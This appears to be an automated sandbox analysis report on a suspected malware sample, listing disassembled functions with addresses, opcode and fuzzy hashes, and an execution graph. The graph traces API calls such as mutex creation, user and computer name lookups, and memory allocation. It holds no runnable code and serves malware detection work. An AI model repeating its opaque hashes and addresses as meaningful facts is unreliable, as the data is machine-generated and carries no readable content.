                                                                                                    • Opcode ID: 12e1071fee19beea7cefedbff8bfbdf111e5322b3793e6ba8a2983cecb4d22ba
                                                                                                    • Instruction ID: a7534ff0c01b73f4d4b3e3d57a285e183e97794b45bbe9aecd3de759ff43f849
                                                                                                    • Opcode Fuzzy Hash: 12e1071fee19beea7cefedbff8bfbdf111e5322b3793e6ba8a2983cecb4d22ba
                                                                                                    • Instruction Fuzzy Hash: 2F026030A05219CFCB14DF68C985AADBBF2FF88304F15C6A9E459EB649D734A981CF50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005474C0 Relevance: 1.6, Strings: 1, Instructions: 337COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: <,S
                                                                                                    • API String ID: 0-425963014
                                                                                                    • Opcode ID: c891ccf2eac52642c46617d2934f098e7998cb192fc1a13c17011a15f20d0810
                                                                                                    • Instruction ID: c77a2184447b7e3615aa8ef47108290c0ae0af71adb336f69e017df35fed4005
                                                                                                    • Opcode Fuzzy Hash: c891ccf2eac52642c46617d2934f098e7998cb192fc1a13c17011a15f20d0810
                                                                                                    • Instruction Fuzzy Hash: 9FD11C34A046098FCB14DF69C588AADBBF2FF88318F56C4A9D505AB366DB31EC41CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484BF57 Relevance: 1.5, Strings: 1, Instructions: 268COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 48Zl
                                                                                                    • API String ID: 0-1881513071
                                                                                                    • Opcode ID: 7a1cf50356c3a60e803cd79a278a532a8b0622f2e49cdf0e1ef72629e170c750
                                                                                                    • Instruction ID: acbd80a223757d356320ad0d8f9b485e8d8779cc9509fd009df3f70980408e9d
                                                                                                    • Opcode Fuzzy Hash: 7a1cf50356c3a60e803cd79a278a532a8b0622f2e49cdf0e1ef72629e170c750
                                                                                                    • Instruction Fuzzy Hash: D2C12C70A01229CFCB14DF68C985AADBBF2FF88304F15C6A9D059EB659D734A981CF50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 002609A7 Relevance: 1.4, Strings: 1, Instructions: 175COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.603959792.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_260000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @2Zl
                                                                                                    • API String ID: 0-2582589042
                                                                                                    • Opcode ID: 93e26302038d75244cea1b5b0d27a217e4debdf3400d33c4946c45e05cbff7f2
                                                                                                    • Instruction ID: 4f4577ee5ba9c4da20f27d87c1eb1676d8c68c1fb6dcf48a9ffb25fbd6bfc816
                                                                                                    • Opcode Fuzzy Hash: 93e26302038d75244cea1b5b0d27a217e4debdf3400d33c4946c45e05cbff7f2
                                                                                                    • Instruction Fuzzy Hash: C5716A70B046088FE748EF66E890AADBBE3EFC9304F04C539D1089B678DB755945CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 002609B8 Relevance: 1.4, Strings: 1, Instructions: 169COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.603959792.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_260000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @2Zl
                                                                                                    • API String ID: 0-2582589042
                                                                                                    • Opcode ID: 10ace2cda0276bf7a9c51f78d2a869a7c1f4c7806ccda1671cb7819e40e5378a
                                                                                                    • Instruction ID: fa39e4eb2606d3b3483971bd527ae46441316eccc4f5860edd284712b92775bd
                                                                                                    • Opcode Fuzzy Hash: 10ace2cda0276bf7a9c51f78d2a869a7c1f4c7806ccda1671cb7819e40e5378a
                                                                                                    • Instruction Fuzzy Hash: C5716B70B006088FE748EF66E894A9DBBE3EFC9304F44C539D1089B638DB755945CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0054AD48 Relevance: .5, Instructions: 529COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 24d257bc781ee7569262d243182db29c17bf1278d05d1045f1bf763939ec17b5
                                                                                                    • Instruction ID: d2fefca62095fffa70b60170c7fd8ade99cef93e165e7573cfce31c84873f1c0
                                                                                                    • Opcode Fuzzy Hash: 24d257bc781ee7569262d243182db29c17bf1278d05d1045f1bf763939ec17b5
                                                                                                    • Instruction Fuzzy Hash: EB12F8387402048FDB48DF29D994DAE7BE6BF89308B158468EA06DB375DB71EC01DB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F7A28 Relevance: .5, Instructions: 495COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9d148238bd5020677188c011e151d52e9e6514b1258e08a7a06663be95d9586a
                                                                                                    • Instruction ID: 40920a93797f9ecd29417d94a8a88c091d04b0bfdf0ae3830256643b56a75bba
                                                                                                    • Opcode Fuzzy Hash: 9d148238bd5020677188c011e151d52e9e6514b1258e08a7a06663be95d9586a
                                                                                                    • Instruction Fuzzy Hash: DF122B71E041198FCB14CFA9C9809AEB7F2FF88310F2AC16AE919EB755D7399C418B54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F80E0 Relevance: .4, Instructions: 395COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 27a8be6bbd0e0074ad80e8e4e8ee2d14fd195a9aa1bf20f67ee65517531a278b
                                                                                                    • Instruction ID: b99ceffa713451d11d48d97968bd16c91259e1d16482c3996322fd954984cf35
                                                                                                    • Opcode Fuzzy Hash: 27a8be6bbd0e0074ad80e8e4e8ee2d14fd195a9aa1bf20f67ee65517531a278b
                                                                                                    • Instruction Fuzzy Hash: FDE11F71E001199FDB04CF99C9849AEFBF6FF88310F1AC15AE915EB315DA38AC428B55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484D441 Relevance: .2, Instructions: 216COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d91f21cd630d517e003d87f59b471a2433e67edd121f55687ea17d51a7415c71
                                                                                                    • Instruction ID: 3d509728607eeccb0a0aa237246524cb91a38899f1e2bf9e1b0d3d519386b0a4
                                                                                                    • Opcode Fuzzy Hash: d91f21cd630d517e003d87f59b471a2433e67edd121f55687ea17d51a7415c71
                                                                                                    • Instruction Fuzzy Hash: 73717F32B101248BD714EB69D890AAEB2E3EFC4754F1AC574E405DB799DF34AC018BD0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0054D308 Relevance: 11.6, Strings: 9, Instructions: 336COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: <,S$<,S$<,S$<,S$<,S$<,S$<,S$<,S$X-[l
                                                                                                    • API String ID: 0-415530415
                                                                                                    • Opcode ID: 6a195bd5fa13d1fe13de88b3a7010f88aa9567a10552cca9bedd2ff16a7dd8ff
                                                                                                    • Instruction ID: 01b1b9338f0d895faf01bd9ab531a22681ea338e331c50e3ea847084ced71ecd
                                                                                                    • Opcode Fuzzy Hash: 6a195bd5fa13d1fe13de88b3a7010f88aa9567a10552cca9bedd2ff16a7dd8ff
                                                                                                    • Instruction Fuzzy Hash: 7FD19F307005059FCB18DF25C490AAEBBF2FF84308F168569E94A9B755DB34EC45CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0054A288 Relevance: 9.2, Strings: 7, Instructions: 409COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: <,S$<,S$<,S$<,S$TRZl$\ [l$\EZl
                                                                                                    • API String ID: 0-1877261980
                                                                                                    • Opcode ID: 87c28ce1ad6c325481137eca8027a1520a064ef6a0e4e0b7d63850a2a4f6e352
                                                                                                    • Instruction ID: 3f8bcd0ba32549e99fc4c8ddbe52779f86e06da3040ac2c6703ade2c6405d20b
                                                                                                    • Opcode Fuzzy Hash: 87c28ce1ad6c325481137eca8027a1520a064ef6a0e4e0b7d63850a2a4f6e352
                                                                                                    • Instruction Fuzzy Hash: 51D1F6347042418FC755EB6488A1AFE76A79FC5308B19847DE51A9F786DF60DC0A83E3
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00524D00 Relevance: 7.6, Strings: 6, Instructions: 140COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: TRZl$TRZl$TRZl$\EZl$\EZl$\EZl
                                                                                                    • API String ID: 0-119587040
                                                                                                    • Opcode ID: aad25e4b7f7a167bac5e0cb6f969483d5e8ab202de2ce6726f7398ea2a4e5c14
                                                                                                    • Instruction ID: 435c2913498b1a0cb2bb9467d9e5c9bc4d0cdc93517d8f95bcb5cfa5af47afd6
                                                                                                    • Opcode Fuzzy Hash: aad25e4b7f7a167bac5e0cb6f969483d5e8ab202de2ce6726f7398ea2a4e5c14
                                                                                                    • Instruction Fuzzy Hash: 2941F230700531CBDA265B58A95263EB99ABFC6B40F25492DDD468A6D8CB70CC02DFA3
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052D7E8 Relevance: 5.3, Strings: 4, Instructions: 278COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: hHP$hHP$hHP$hHP
                                                                                                    • API String ID: 0-187947521
                                                                                                    • Opcode ID: c862bae50d7ad519f536006a62888af017b8cb7a4f0cb51780444c480d05516c
                                                                                                    • Instruction ID: 8cf821bfb04bd4c6bb6e132ce2138257436a32e10ce9bafb9bc9ce1c8661c568
                                                                                                    • Opcode Fuzzy Hash: c862bae50d7ad519f536006a62888af017b8cb7a4f0cb51780444c480d05516c
                                                                                                    • Instruction Fuzzy Hash: A791E670B08221CBCB15A664A4A457E6AB7FFD7300725C93BD546C73D8DF348C059BA6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052D2B0 Relevance: 5.2, Strings: 4, Instructions: 235COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: hHP$hHP$hHP$hHP
                                                                                                    • API String ID: 0-187947521
                                                                                                    • Opcode ID: a9ef8dcc6de09582ddbc98d691c47c8de10808be2af9dee36b0f74e7102c1866
                                                                                                    • Instruction ID: 1f333dd4881ac1d59e89d120ada6f009e537b909987da519d885f30158ec8893
                                                                                                    • Opcode Fuzzy Hash: a9ef8dcc6de09582ddbc98d691c47c8de10808be2af9dee36b0f74e7102c1866
                                                                                                    • Instruction Fuzzy Hash: 0071E131B04531CBC725A624B55413E2AB6BFE7754B26893AC94ACB3C9DF349C0687F2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00545B90 Relevance: 5.2, Strings: 4, Instructions: 205COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ,)[l$<,S$<,S$<,S
                                                                                                    • API String ID: 0-2915197652
                                                                                                    • Opcode ID: e4ae494c04266cfab1a9583e955537254bfbf274ba3ea14802ba45d57b2fb3a1
                                                                                                    • Instruction ID: 8ac341076a4f5a7bfcdbd82a9e25b6c033487096b4b5eef910aa17eb4cd34bb6
                                                                                                    • Opcode Fuzzy Hash: e4ae494c04266cfab1a9583e955537254bfbf274ba3ea14802ba45d57b2fb3a1
                                                                                                    • Instruction Fuzzy Hash: DE61F231B046104FC728DB7688545BEBBE2EFC9304B06887DE54ADB391EB34DD068791
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005456F0 Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: <,S$<,S$<,S$<,S
                                                                                                    • API String ID: 0-4277764744
                                                                                                    • Opcode ID: f34cdab3301e7fcadbbf39c0d8edc02b14880a83907ce06de4c3d8ef1f4107e8
                                                                                                    • Instruction ID: 5a3df7415314d68073ee0df1ba198bd636ccdf58f070305586ca273fb198e2b4
                                                                                                    • Opcode Fuzzy Hash: f34cdab3301e7fcadbbf39c0d8edc02b14880a83907ce06de4c3d8ef1f4107e8
                                                                                                    • Instruction Fuzzy Hash: A621C831B0D7C05FC316966444217AE6FE26FD2344F1A44BED546DB683DE299D068393
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00527FB5 Relevance: 5.1, Strings: 4, Instructions: 68COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: hHP$hHP$hHP$hHP
                                                                                                    • API String ID: 0-187947521
                                                                                                    • Opcode ID: a4382d88838411c4b6425bb1f4973d0da5587ef61003a50fc604d1a60fbb7389
                                                                                                    • Instruction ID: 5185acd1e6656c8e47139d85188451328e616691f13126a9ac76119e2709196d
                                                                                                    • Opcode Fuzzy Hash: a4382d88838411c4b6425bb1f4973d0da5587ef61003a50fc604d1a60fbb7389
                                                                                                    • Instruction Fuzzy Hash: AA21C530A05419CBC710BBA8E58857EBFB5FF99300F158579D286A32D8DF314D19DB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:10.7%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:14.2%
                                                                                                    Total number of Nodes:2000
                                                                                                    Total number of Limit Nodes:29
                                                                                                    execution_graph 17988 402290 17989 4022a4 17988->17989 17990 4022d0 17989->17990 17991 402353 17989->17991 17993 4022c1 17989->17993 17990->17993 18003 401ad8 17990->18003 17991->17993 17996 4023f0 17991->17996 17998 401e08 17991->17998 18006 401d04 17991->18006 17996->17993 18010 401c7c 17996->18010 18014 4016c0 17998->18014 18000 401e1d 18002 401e2a 18000->18002 18025 401d50 18000->18025 18002->17991 18055 4020ec 18003->18055 18005 401af9 18005->17993 18007 401d16 18006->18007 18008 401d0d 18006->18008 18007->17991 18008->18007 18009 401ad8 9 API calls 18008->18009 18009->18007 18011 401cd1 18010->18011 18012 401c9a 18010->18012 18011->18012 18076 401bcc 18011->18076 18012->17993 18017 4016df 18014->18017 18015 4013ec LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 18015->18017 18016 401793 18022 40173f 18016->18022 18036 40151c 18016->18036 18017->18015 18017->18016 18019 401284 LocalAlloc 18017->18019 18020 401779 18017->18020 18021 40172e 18017->18021 18019->18017 18023 401464 VirtualFree 18020->18023 18032 401464 18021->18032 18022->18000 18023->18022 18026 401d04 9 API calls 18025->18026 18027 401d64 18026->18027 18040 401284 18027->18040 18029 401d74 18031 401d7c 18029->18031 18044 401aa8 18029->18044 18031->18002 18035 401493 18032->18035 18033 4014ec 18033->18022 18034 4014c0 VirtualFree 18034->18035 18035->18033 18035->18034 18038 401562 18036->18038 18037 401592 18037->18022 18038->18037 18039 40157e VirtualAlloc 18038->18039 18039->18037 18039->18038 18041 4012a0 18040->18041 18049 40123c 18041->18049 18045 401ac5 18044->18045 18046 401ab6 18044->18046 18045->18031 18047 401c7c 9 API calls 18046->18047 18048 401ac3 18047->18048 18048->18031 18052 4011e4 18049->18052 18053 4011f0 LocalAlloc 18052->18053 18054 401202 18052->18054 18053->18054 18054->18029 18056 402105 18055->18056 18059 40210a 18055->18059 18069 401870 RtlInitializeCriticalSection 18056->18069 18058 40213b RtlEnterCriticalSection 18061 402145 18058->18061 18059->18058 18059->18061 18063 40210e 18059->18063 18060 402151 18064 402273 RtlLeaveCriticalSection 18060->18064 18065 40227d 18060->18065 18061->18060 18062 4021d4 18061->18062 18067 402200 18061->18067 18062->18063 18066 401d04 7 API calls 18062->18066 18063->18005 18064->18065 18065->18005 18066->18063 18067->18060 18068 401c7c 7 API calls 18067->18068 18068->18060 18070 401894 RtlEnterCriticalSection 18069->18070 18071 40189e 18069->18071 18070->18071 18072 4018bc LocalAlloc 18071->18072 18073 4018d6 18072->18073 18074 401925 18073->18074 18075 40191b RtlLeaveCriticalSection 18073->18075 18074->18059 18075->18074 18078 401be2 18076->18078 18077 401c6a 18077->18012 18078->18077 18079 401c21 18078->18079 18080 401c0d 18078->18080 18082 4017e4 3 API calls 18079->18082 18089 4017e4 18080->18089 18083 401c1f 18082->18083 18083->18077 18084 401aa8 9 API calls 18083->18084 18085 401c45 18084->18085 18086 401c5f 18085->18086 18099 401afc 18085->18099 18104 4012f4 18086->18104 18090 40180a 18089->18090 18098 401863 18089->18098 18108 4015b0 18090->18108 18093 401284 LocalAlloc 18094 401827 18093->18094 18095 40183e 18094->18095 18096 401464 VirtualFree 18094->18096 18097 4012f4 LocalAlloc 18095->18097 18095->18098 18096->18095 18097->18098 18098->18083 18100 401b01 18099->18100 18101 401b0f 18099->18101 18102 401ad8 9 API calls 18100->18102 18101->18086 18103 401b0e 18102->18103 18103->18086 18105 4012ff 18104->18105 18106 40123c LocalAlloc 18105->18106 18107 40131a 18105->18107 18106->18107 18107->18077 18111 4015e7 18108->18111 18109 401627 18109->18093 18110 401601 VirtualFree 18110->18111 18111->18109 18111->18110 18112 41a684 18119 404d00 GetModuleHandleA 18112->18119 18114 41a694 18121 419108 18114->18121 18120 404d33 18119->18120 18120->18114 18122 419110 18121->18122 18395 4034e4 18122->18395 18128 419155 18404 407d24 18128->18404 18134 41917e 18135 419189 CreateMutexA 18134->18135 18136 4191a3 18135->18136 18137 419f30 18136->18137 18139 4034e4 7 API calls 18136->18139 18138 4034e4 7 API calls 18137->18138 18140 419f48 18138->18140 18148 4191b6 18139->18148 19093 403b98 18140->19093 18142 4191e4 18472 418f9c 18142->18472 18146 4034e4 7 API calls 18147 419f63 18146->18147 18150 403b98 SysFreeString 18147->18150 18148->18142 18151 403798 21 API calls 18148->18151 18763 4036cc 18148->18763 18153 419f73 18150->18153 18151->18148 18152 406c4c 35 API calls 18154 4191f7 18152->18154 19097 403508 18153->19097 18483 406810 18154->18483 18162 419219 18518 4176d8 18162->18518 18163 403508 7 API calls 18166 419f9e 18163->18166 18168 403b80 SysFreeString 18166->18168 18170 419fa9 18168->18170 18172 403508 7 API calls 18170->18172 18171 4176d8 21 API calls 18180 41924c 18171->18180 18173 419fb9 18172->18173 18174 403b80 SysFreeString 18173->18174 18175 419fc4 18174->18175 18176 403508 7 API calls 18175->18176 18177 419fd4 18176->18177 18178 403b80 SysFreeString 18177->18178 18179 419fdf 18178->18179 18181 403508 7 API calls 18179->18181 18180->18137 18601 407428 18180->18601 18183 419fef 18181->18183 18185 403b80 SysFreeString 18183->18185 18187 419ffa 18185->18187 18189 403508 7 API calls 18187->18189 18192 41a00a 18189->18192 18190 407428 21 API calls 18191 4192b2 18190->18191 18622 406ae4 18191->18622 18194 403b80 SysFreeString 18192->18194 18196 41a015 18194->18196 18198 403508 7 API calls 18196->18198 18200 41a025 18198->18200 18202 403b80 SysFreeString 18200->18202 18201 407428 21 API calls 18203 4192e9 18201->18203 18204 41a030 18202->18204 18205 406984 21 API calls 18203->18205 18206 403508 7 API calls 18204->18206 18208 4192fa 18205->18208 18207 41a040 18206->18207 18209 403b80 SysFreeString 18207->18209 18644 4080c4 18208->18644 18211 41a04b 18209->18211 18213 403508 7 API calls 18211->18213 18215 41a05b 18213->18215 18216 403b98 SysFreeString 18215->18216 18217 41a06b 18216->18217 18218 4034e4 7 API calls 18217->18218 18219 41a076 18218->18219 18221 403b98 SysFreeString 18219->18221 18220 419909 19003 417290 18220->19003 18222 41a086 18221->18222 18224 4034e4 7 API calls 18222->18224 18226 41a091 18224->18226 18228 403b98 SysFreeString 18226->18228 18230 41a0a1 18228->18230 18233 4034e4 7 API calls 18230->18233 18234 41a0ac 18233->18234 18238 403b98 SysFreeString 18234->18238 18235 40795c 26 API calls 18290 41930d 18235->18290 18241 41a0bc 18238->18241 18247 4034e4 7 API calls 18241->18247 18242 40357c 7 API calls 18242->18290 18251 41a0c7 18247->18251 18255 403b98 SysFreeString 18251->18255 18257 41a0d7 18255->18257 18263 403508 7 API calls 18257->18263 18260 419451 GetSystemMetrics GetSystemMetrics 18943 4178b4 18260->18943 18262 40dce8 22 API calls 18262->18290 18268 41a0e7 18263->18268 18264 407428 21 API calls 18264->18290 18267 418688 60 API calls 18267->18290 19104 404224 18268->19104 18272 41a0fa 18273 403508 7 API calls 18272->18273 18274 41a107 18273->18274 18277 4034e4 7 API calls 18274->18277 18276 403850 21 API calls 18276->18290 18279 41a10f 18277->18279 18282 4034e4 7 API calls 18279->18282 18284 41a117 18282->18284 18285 403508 7 API calls 18284->18285 18286 41a124 18285->18286 18288 403508 7 API calls 18286->18288 18291 41a131 18288->18291 18290->18137 18290->18220 18290->18235 18290->18242 18290->18260 18290->18262 18290->18264 18290->18267 18290->18276 18341 41940e 18290->18341 18742 40d7f0 18290->18742 18766 4053d8 18290->18766 18770 414028 18290->18770 18779 408120 18290->18779 18782 405528 18290->18782 18787 414098 18290->18787 18790 415ea8 18290->18790 18799 4050c8 18290->18799 18807 414cb8 18290->18807 18911 414f40 18290->18911 18956 406fdc 18290->18956 18293 4034e4 7 API calls 18291->18293 18295 41a139 18293->18295 18388 4033f4 18295->18388 18300 414408 47 API calls 18300->18290 18304 4070bc 8 API calls 18304->18341 18307 4034e4 7 API calls 18307->18341 18309 403850 21 API calls 18309->18341 18326 407048 9 API calls 18326->18341 18339 4037dc 21 API calls 18339->18341 18341->18300 18341->18304 18341->18307 18341->18309 18341->18326 18341->18339 18345 414408 47 API calls 18341->18345 18827 414408 18341->18827 18962 403c98 18341->18962 18978 403d58 18341->18978 18984 40781c 18341->18984 18345->18290 18389 40340d 18388->18389 18391 403436 18389->18391 22408 403368 18389->22408 18392 403478 FreeLibrary 18391->18392 18393 40349c ExitProcess 18391->18393 18392->18391 18396 4034ea 18395->18396 18398 403505 18395->18398 18396->18398 19129 402550 18396->19129 18399 40357c 18398->18399 18400 403580 18399->18400 18401 4035a4 18400->18401 18402 402550 7 API calls 18400->18402 18403 40561c 63 API calls 18401->18403 18402->18401 18403->18128 19143 403538 18404->19143 18408 407d3d 18409 407d4d 18408->18409 18410 403538 21 API calls 18408->18410 18411 407b78 2 API calls 18409->18411 18410->18409 18412 407d57 18411->18412 18413 407d67 18412->18413 18414 403538 21 API calls 18412->18414 18415 407b78 2 API calls 18413->18415 18414->18413 18416 407d71 18415->18416 18417 407d81 18416->18417 18418 403538 21 API calls 18416->18418 19154 407c58 18417->19154 18418->18417 18420 407d86 18421 407d96 18420->18421 18422 403538 21 API calls 18420->18422 18423 406c4c 18421->18423 18422->18421 18424 406c54 18423->18424 18424->18424 18425 406c76 18424->18425 18426 406c88 18424->18426 18427 403538 21 API calls 18425->18427 19210 406e70 18426->19210 18430 406c83 18427->18430 18429 406c90 19215 406bb4 18429->19215 18431 403508 7 API calls 18430->18431 18433 406d78 18431->18433 18435 403b98 SysFreeString 18433->18435 18434 406ca3 19218 4065cc GetUserNameW 18434->19218 18436 406d85 18435->18436 18437 403508 7 API calls 18436->18437 18439 406d92 18437->18439 18458 403798 18439->18458 18440 406cb6 19224 406610 GetComputerNameW 18440->19224 18442 406cc9 19230 406258 18442->19230 18445 406258 21 API calls 18446 406cf2 18445->18446 18447 406258 21 API calls 18446->18447 18448 406d05 18447->18448 18449 406258 21 API calls 18448->18449 18450 406d18 18449->18450 18451 403850 21 API calls 18450->18451 18452 406d39 18451->18452 18453 406258 21 API calls 18452->18453 18454 406d44 18453->18454 18455 403850 21 API calls 18454->18455 18456 406d54 18455->18456 18457 403538 21 API calls 18456->18457 18457->18430 18459 4037db 18458->18459 18460 40379c 18458->18460 18459->18134 18461 4037a6 18460->18461 18462 403538 18460->18462 18463 4037d0 18461->18463 18464 4037b9 18461->18464 18465 40354c 18462->18465 18469 4035a8 21 API calls 18462->18469 18466 403ac0 21 API calls 18463->18466 19294 403ac0 18464->19294 18467 40357a 18465->18467 18470 402550 7 API calls 18465->18470 18471 4037be 18466->18471 18467->18134 18469->18465 18470->18467 18471->18134 18473 418fb5 18472->18473 18474 4034e4 7 API calls 18473->18474 18481 418fd0 18474->18481 18475 4190d9 18476 4034e4 7 API calls 18475->18476 18477 4190ee 18476->18477 18478 4034e4 7 API calls 18477->18478 18479 4190f6 18478->18479 18479->18152 18480 4036cc 21 API calls 18480->18481 18481->18475 18481->18480 18482 